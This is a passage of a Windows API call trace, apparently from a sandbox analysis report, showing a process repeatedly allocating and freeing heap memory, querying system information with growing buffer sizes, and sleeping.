hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.436] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0218.437] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.437] Sleep (dwMilliseconds=0x110) [0218.451] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0218.451] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.452] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.452] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0218.452] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.452] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.455] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0218.455] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.456] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.456] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0218.456] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0218.457] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.457] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0218.458] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.458] Sleep (dwMilliseconds=0x110) [0218.469] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0218.469] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.470] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.470] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0218.470] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.471] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.471] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0218.471] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.471] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.472] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0218.472] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0218.472] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.472] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0218.473] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.473] Sleep (dwMilliseconds=0x110) [0218.481] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0218.481] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.482] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.482] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0218.482] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.483] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.483] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0218.483] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.484] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.484] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0218.484] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0218.485] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.485] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0218.485] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.485] Sleep (dwMilliseconds=0x110) [0218.498] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0218.498] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.499] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.499] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0218.499] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.499] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.499] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0218.499] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.500] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.500] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0218.501] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0218.501] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.501] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0218.501] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.501] Sleep (dwMilliseconds=0x110) [0218.513] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0218.514] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.514] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.520] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0218.520] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.521] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.521] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0218.521] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.522] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.522] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0218.523] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0218.523] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.523] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0218.524] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.524] Sleep (dwMilliseconds=0x110) [0218.530] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0218.530] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.531] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.531] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0218.531] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.531] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.531] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0218.531] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.532] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.532] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0218.532] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0218.533] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.533] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0218.533] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.533] Sleep (dwMilliseconds=0x110) [0218.544] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0218.544] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.545] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.545] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0218.545] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.546] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.546] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0218.546] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.546] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.546] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0218.547] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0218.547] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.547] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0218.548] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.548] Sleep (dwMilliseconds=0x110) [0218.564] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0218.564] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.564] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.564] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0218.564] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.565] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.565] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0218.565] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.566] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.566] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0218.566] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0218.567] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.567] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0218.567] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.567] Sleep (dwMilliseconds=0x110) [0218.578] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0218.578] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.579] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.579] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0218.579] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.580] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.582] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0218.582] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.583] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.583] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0218.583] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0218.584] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.584] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0218.586] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.586] Sleep (dwMilliseconds=0x110) [0218.592] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0218.592] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.593] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.593] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0218.593] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.594] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.594] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0218.594] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.594] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.595] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0218.595] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0218.596] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.596] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0218.597] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.597] Sleep (dwMilliseconds=0x110) [0218.607] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0218.607] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.608] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.608] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0218.608] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.609] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.609] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0218.609] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.610] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.610] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0218.610] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0218.611] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.611] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0218.613] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.613] Sleep (dwMilliseconds=0x110) [0218.628] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0218.628] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.629] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.629] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0218.629] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.629] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.629] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0218.630] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.630] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.630] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0218.631] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0218.631] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.631] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0218.632] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.632] Sleep (dwMilliseconds=0x110) [0218.638] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0218.638] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.638] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.638] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0218.638] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.639] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.639] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0218.639] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.639] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.639] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0218.640] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0218.640] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.640] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0218.641] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.641] Sleep (dwMilliseconds=0x110) [0218.721] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0218.721] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.722] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.722] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0218.722] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.722] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.722] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0218.722] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.723] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.723] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) 